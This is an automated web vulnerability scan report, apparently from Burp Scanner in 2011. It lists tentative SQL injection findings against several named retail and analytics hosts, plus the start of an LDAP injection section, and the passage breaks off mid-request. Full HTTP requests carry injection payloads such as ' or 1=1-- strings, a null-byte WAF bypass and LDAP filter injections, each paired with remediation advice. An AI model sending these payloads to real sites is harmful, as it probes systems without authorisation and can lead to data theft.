28.18. https://www.toshibadirect.com/



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://img.bluenile.com
Path:   /is/image/bluenile/txttemp_hdr_h5

Issue detail

The $layer_2_text_4 parameter appears to be vulnerable to SQL injection attacks. The payloads 15710605'%20or%201%3d1--%20 and 15710605'%20or%201%3d2--%20 were each submitted in the $layer_2_text_4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d1--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 1

HTTP/1.1 200 OK
Content-Length: 3264
Content-Type: image/gif
ETag: "68a098526d9c663ce408d5bf0d8d4097"
Expires: Thu, 30 Jun 2011 02:11:23 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:18 GMT
Connection: keep-alive

GIF89a ...[binary GIF image data (Content-Length: 3264) not reproduced]...
...[SNIP]...

Request 2

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d2--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 2

HTTP/1.1 200 OK
Content-Length: 3283
Content-Type: image/gif
ETag: "6cd3f5060d003d4a8b293ab0f32fb5b0"
Expires: Thu, 30 Jun 2011 02:11:42 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:19 GMT
Connection: keep-alive

GIF89a ...[binary GIF image data (Content-Length: 3283) not reproduced]...
...[SNIP]...

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.brookstone.com
Path:   /b/ss/bstoneprod/1/H.21/s08547089211642

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 404
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.gnc.com
Path:   /b/ss/gsicgncf/1/H.20.3/s37654085024105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
xserver: www408
Content-Length: 0
Content-Type: text/html


1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.ca
Path:   /webapp/wcs/stores/servlet/Home

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:34 GMT
Content-Length: 94929


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&amp;#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M&#153;</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara&#153; Interior Design Window Film - Rice Paper</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$34.95</span><span class="new-price">$29.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:35 GMT
Content-Length: 95035


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$39.99</span><span class="new-price">$34.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&amp;#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M&#153;</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara&#153; Interior Design Window Film - Rice Paper
...[SNIP]...

2. LDAP injection
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The pixId parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the pixId parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbjs?pixId=*)(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3000a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pj0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5k0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: JSESSIONID=BFCF45F58B9C4575A09FBB0A8F2FCF28; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:09 GMT






Request 2

GET /orbserv/hbjs?pixId=*)!(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
